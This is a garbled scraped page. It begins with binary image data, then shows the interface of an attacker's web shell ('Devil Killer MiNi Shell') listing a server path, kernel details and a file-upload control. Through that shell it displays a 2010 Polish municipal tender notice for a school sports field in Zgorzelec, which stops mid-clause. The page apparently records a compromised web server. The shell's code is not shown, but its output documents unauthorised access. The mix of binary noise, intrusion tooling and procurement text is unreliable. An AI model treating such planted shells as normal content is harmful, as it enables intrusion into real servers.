JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101012/283121-N-2010.html

<p class="kh_header"><b>Zgorzelec: Budowa boiska wielofunkcyjnego przy Szkole Podstawowej nr 3</b><br>
<b>Numer ogłoszenia: 283121 - 2010; data zamieszczenia: 12.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska wielofunkcyjnego przy Szkole Podstawowej nr 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na budowie boiska wielofunkcyjnego
przy Szkole Podstawowej nr 3 w Zgorzelcu.
2.	W ramach robot wykonane zostaną następujące elementy:
a)	boisko wielofunkcyjne o nawierzchni poliuretanowej typu SP o powierzchni 1232 m2 z polem do gry w piłkę ręczną, dwoma wewnętrznymi boiskami do koszykówki oraz boiskiem do gry w siatkówkę, na podłożu elastycznym o grubości 35 mm,
b)	ogrodzenie całego boiska o wysokości ogrodzenia 4 m.,
c)	sieć kanalizacji deszczowej - odwodnienie boiska, obejmująca:
   - rurociąg drenarski PCV z filtrem o śr. 80 mm - 108 m.,
          - rurociąg drenarski PCV z filtrem o śr. 125 mm - 51 m.,
          - studzienka kanalizacyjna systemowa o średnicy 315-425 mm  - 1 szt,
          - kanal z rur PCV łączony na wcisk o śr. zew. 160 mm - 21 m,
d)	sieć elektryczną oświetlenia terenu, obejmującą:
   - obwód nr 1 - linia kablowa YKY 5x6 mm2, o długości 186 mb, 6 punktów oświetleniowych,
          - obwód nr 2 - linia kablowa YKY 5x6 mm2, o długości 130 mb, 2 punkty oświetleniowe,
e)	chodniki i dojścia z kostki brukowej betonowej - 239 m2,
f)	zagospodarowanie placów przy boiskach - 500 m2.    
3.	W ramach robót budowlanych przewidziano również mechaniczne rozebranie nawierzchni z 
     mieszanek mineralno-bitumicznych o grubości 3 cm w ilości 2131 m2 wraz z obrzeżami i jej 
     utylizacja. 		
4.	Szczegółowy zakres robót budowlanych zawiera Dokumentacja Projektowa stanowiąca 
     załącznik nr 1 do SIWZ (z wyłączeniem części dotyczących budowy nagłośnienia i 
     monitoringu boiska wielofunkcyjnego, budowy bieżni i skoczni w dal oraz placu zabaw i 
     rekreacji tzw. ogródka szkolnego)  oraz Specyfikacje Techniczne Wykonania i Odbioru  
     Robót, stanowiące załącznik nr 2 do SIWZ 

UWAGA: Wszystkie wskazane z nazwy materiały, urządzenia i przyjęte technologie użyte w dokumentacji projektowej należy rozumieć jako określenie wymaganych minimalnych parametrów technicznych lub standardów jakościowych. Oznacza to, że Zamawiający dopuszcza zastosowanie materiałów, urządzeń i technologii równoważnych do nazwanych materiałów, urządzeń oraz proponowanej technologii wykonania, wymienionych w dokumentacji projektowej z zachowaniem ich wymogów w zakresie jakości.

5.	Przed przystąpieniem do robót budowlanych, Wykonawca przedstawi Zamawiającemu 
tymczasowy projekt zmiany organizacji ruchu na czas trwania budowy, uzgodniony z odpowiednim zarządem drogi i organem zarządzającym ruchem
6.  Przed przystąpieniem do robót Wykonawca winien dokonać wizji lokalnej terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji przedmiotu umowy. Wizję lokalną Wykonawca dokona na własny koszt.
9.  Wykonawca opracuje dokumentację powykonawczą i przekaże ją Zamawiającemu na 5 dni 
przed terminem odbioru końcowego po zakończeniu etapu III robót budowlanych .
     W skład dokumentacji powykonawczej wejść powinny:
     -  inwentaryzacja geodezyjna,
     -  atesty i certyfikaty wbudowanych materiałów, prefabrykatów lub urządzeń,
     -  aprobaty techniczne,
     - uzupełniony dziennik budowy/rozbiórki,
     - wymagane przepisami protokoły i zaświadczenia, z przeprowadzonych przez Wykonawcę, 
       badań i sprawdzeń,
     - oświadczenie kierownika budowy o zgodności wykonania obiektu budowlanego z projektem 
       budowlanym, warunkami pozwolenia na budowę lub zgłoszenia robot, przepisami i 
       obowiązującymi Polskimi Normami oraz oświadczenie kierownika budowy o doprowadzeniu 
      do należytego stanu i porządku terenu budowy, a także sąsiedniej ulicy, nieruchomości,
     -  w przypadku zmian nie odstępujących w sposób istotny od zatwierdzonego projektu i 
       warunków zgłoszenia robót niewymagających pozwolenia na budowę, Wykonawca dołączy 
       kopie rysunków wchodzących w skład zatwierdzonego projektu budowlanego, z naniesionymi 
       zmianami i uzupełniającym opisem. W takim przypadku oświadczenie kierownika budowy 
       powinno być zatwierdzone przez projektanta i Inspektora nadzoru,
     - oświadczenie kierownika budowy o wbudowaniu materiałów na które dostarczono dokumenty 
       odbiorowe oraz zgodności materiałów z ST i projektem budowlanym
      - oświadczenie inspektora nadzoru o zgodności wykonania obiektu budowlanego z projektem 
       budowlanym, warunkami pozwolenia na budowę, przepisami i obowiązującymi Polskimi 
       Normami,
    - pisemna gwarancja jakości na wykonany przedmiot umowy. Z treści dokumentu gwarancyjnego 
       wynikać powinno: na co udzielona jest gwarancja, czas obowiązywania gwarancji, co 
       wyłączone jest z gwarancji
    -  oświadczenie właściciela terenu na którym prowadzona była inwestycja o przytwróceniu terenu 
       do stanu pierwotnego,
    -  deklaracje zgodności z określeniem miejsca przeznaczenia, zgodnie z ustawą z dnia 16.04.2004 
        roku, o wyrobach budowlanych (Dz.U. z 2004 roku Nr 92 poz. 881 ze zmianami) oraz ustawą 
        z dnia 30.08.2004 roku, o systemie oceny zgodności (tekst jednolity Dz.U. z 2004 roku Nr 204 
        poz. 2087) 
Nie przekazanie Zamawiającemu przedmiotowej dokumentacji w terminie określonym umową o zamówienie będzie skutkowało odmową przystąpienia do odbioru końcowego robót.
W przypadku przekroczenia powyższego terminu Zamawiający obciąży Wykonawcę karą umowną.
10. Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas realizacji zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (Dz. U. Nr 62, poz. 628 z póź. zm.) i ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jednolity z 2008r. Dz. U. Nr 25, poz.150).
Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów, zgodnie z powszechnie obowiązującymi przepisami.
11. Wszelkie roboty budowlane należy prowadzić zgodnie z Decyzją II BS.7351.Zg-8/D-13/194/10 Starosty Zgorzeleckiego, z dnia 15.01.2010 roku, w sprawie zatwierdzenia projektu budowlanego i pozwolenia na budowę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt 6 ustawy PZP, stanowiącego nie więcej niż 50% wartości zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.21.22.21-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca  wniesie wadium w kwocie  17.317,- PLN brutto 
     (słownie: siedemnaście tysięcy trzysta siedemnaście złotych 00/100 brutto)
2. Wadium musi obejmować cały okres związania ofertą.
     Uwaga! Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania    
     Zamawiającego i Wykonawcy  dot. w/w ustaleń będą podlegały odpowiednio nowym terminom.
3. Termin wniesienia wadium upływa przed terminem składania ofert
4. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na przedłużony 
     okres związania ofertą, lub nie wniesie wadium zwróconego mu po wyborze najkorzystniejszej 
     oferty, a do ponownego jego wniesienia Zamawiajacy wezwał Wykonawcę w związku z   
     wyborem oferty Wykonawcy w wyniku rozstrzygnięcia odwołania, zostanie przez 
     Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego. 
5.  W zależności od woli Wykonawcy wadium może być wnoszone w formach:
       a/ pieniądzu,
       b/ poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
           kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
       c/ gwarancjach bankowych,
       d/ gwarancjach ubezpieczeniowych,
       e/ poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2
       ustawy z dnia 09.11.2000 r. o utworzeniu PARP (Dz.U. z 2007r. Nr 42, poz. 275)
      Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium
      zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie      
      zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych uznana za odrzuconą.
 6. W przypadku wniesienia wadium w formach wymienionych w pkt.5 ppkt b,c,d, i e  z 
      treści  dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy 
      gwarancyjnej   nastąpi także w przypadku określonym w pkt. 11.
      Zabronionym jest umieszczenie w treści tego dokumentu jakiejkolwiek klauzuli lub 
      zapisu stanowiącego, że wypłata wadium w okolicznościach określonych w pkt. 11 
      będzie uzależniona od dodatkowych okoliczności dowodowych, które spełnić ma 
      Beneficjent. 
      Gwarancja ma mieć charakter bezwarunkowy i być płatna na pierwsze wezwanie.
7.  Warunkiem uznania wniesienia wadium w formach wymienionych w pkt. 5 ppkt 
      b,c,d, i e  będzie załączony do oferty dokument potwierdzający wniesienie wadium do 
      Zamawiającego.
8.  Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
      zamawiającego Nr 35124012971111000025654013 w banku PEKAO S.A. I O/Zgorzelec. 
      Na przelewie należy  umieścić informację :  Wadium do postępowania przetargowego: 
     Budowa boiska wielofunkcyjnego przy Szkole Podstawowej nr 3
       Potwierdzeniem tej formy wniesienia wadium będzie oryginał dowodu wpłaty lub 
      potwierdzona za zgodność z oryginałem jego kopia załączona  do oferty.
9.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty 
      najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta 
      została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 11.
10. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
       wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
       pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
       za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi  
       na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie 
       złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 w/w ustawy,  lub 
       pełnomocnictw, chyba że udowodni , że wynika to z przyczyn nieleżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta została wybrana:
          a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
              określonych w ofercie, 
          b/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie Wykonawcy.
          c/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
          d/ w przypadku zaistnienia okoliczności wskazanych w pkt.11.
13. Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie po zawarciu przez niego 
       umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
    -  Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych 
       w art. 22 ust. 1 ustawy Prawo Zamówien Publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia / nie spełnia, na podstawie analizy treści:
   -  Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy 
       i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania 
       ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich 
       rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, 
       że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
       Za wystarczające Zamawiający uzna wykazanie przez Wykonawcę:
       -  min. 2 robót budowlanych polegających na budowie lub przebudowie biosk sportowych 
          wielofunkcyjnych z nawierzchni typu SP wraz z robotami towarzyszącymi tj. 
          zagospodarowaniem terenu, odwodnieniem i oświetleniem boisk, budową ogrodzenia boisk 
          oraz budową dojazdów lub dojść do boisk w technologii kostki betonowej, o  wartości 
          minimum 365.000,- zł. brutto każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
    -  Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych 
       w art. 22 ust. 1 ustawy Prawo Zamówien Publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia / nie spełnia, na podstawie analizy treści:
   -  Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
       odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
       budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i 
       wykształcenia niezbędnych do wykonania zamówienia, a także  wykonywanych przez nie 
       czynności oraz informacją o podstawie dysponowania tymi osobami.
       Za wystarczające Zamawiający uzna wykazanie przynajmniej jednej osoby posiadającej 
       uprawienia do wykonywania samodzielnych funkcji technicznych w budownictwie do 
       kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, która pelnić 
       będzie funkcję Kierownika Budowy.
   -  Oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają 
      wymagane  uprawnienia, jeżeli ustawy nakładają obowiązek  posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
    -  Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych 
       w art. 22 ust. 1 ustawy Prawo Zamówien Publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla Wykonawcy na  
    realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą   
    nawierzchnię,</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Wypełniony i podpisany formularz ofertowy
2. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w 
    art. 22 ust. 1 ustawy Prawo Zamówien Publicznych
3. Formularz wskazujący którą część zamówienia Wykonawca powierzy do realizacji 
    Podwykonawcy.  
(Wykonawca który zamierza samodzielnie wykonać zamówienie nie składa wraz z oferta przedmiotowego formularza. W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia innych podmiotów, a nie załączy przedmiotowego formularza do oferty, Zamawiający nie będzie mógł uznać spełnienia przez Wykonawcę warunku posiadania wiedzy i doświadczenia.)
4. Pełnomocnictwo osoby lub osób reprezentujących Wykonawcę lub Wykonawców wspólnie 
      ubiegających się o udzielenie zamówienia (w przypadku konieczności załączenia do oferty 
      takiego pełnomocnictwa)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z zapisami art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający  
przewiduje możliwość dokonania zmian istotnych postanowień zawartej umowy, przy czym 
zakres tych zmian definiuje on  następująco:
         -   Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za realizacje 
             umowy, możliwa będzie w każdym czasie w trakcie związania umową, pod warunkiem że 
             osoby te posiadać będą co najmniej takie same uprawnienia jak osoby wskazane przez 
             Wykonawcę w ofercie.
             W sytuacji zaistnienia uzasadnionych okoliczności powodujących konieczność takiej 
             zmiany, Wykonawca zgłosi ten fakt Zamawiającemu pisemnie wraz z uzasadnieniem.
         -   Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku wystąpienia 
              opóźnień zawinionych przez Zamawiającego  mających wpływ na termin realizacji 
              przedmiotu umowy w szczególności dot. przekazania terenu budowy, dokonywania 
             odbiorów robót , akceptacji robót dodatkowych oraz jakichkolwiek innych opóźnień lub 
             utrudnień ze strony Zamawiającego.
             W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno 
              minimum tyle dni ile trwa opóźnienie spowodowane niniejszymi okolicznościami,
         -   Przesunięcie terminu realizacji zamówienia możliwe będzie z przyczyn losowych, 
              w przypadku wystąpienia działania siły wyższej, mającej bezpośredni wpływ na 
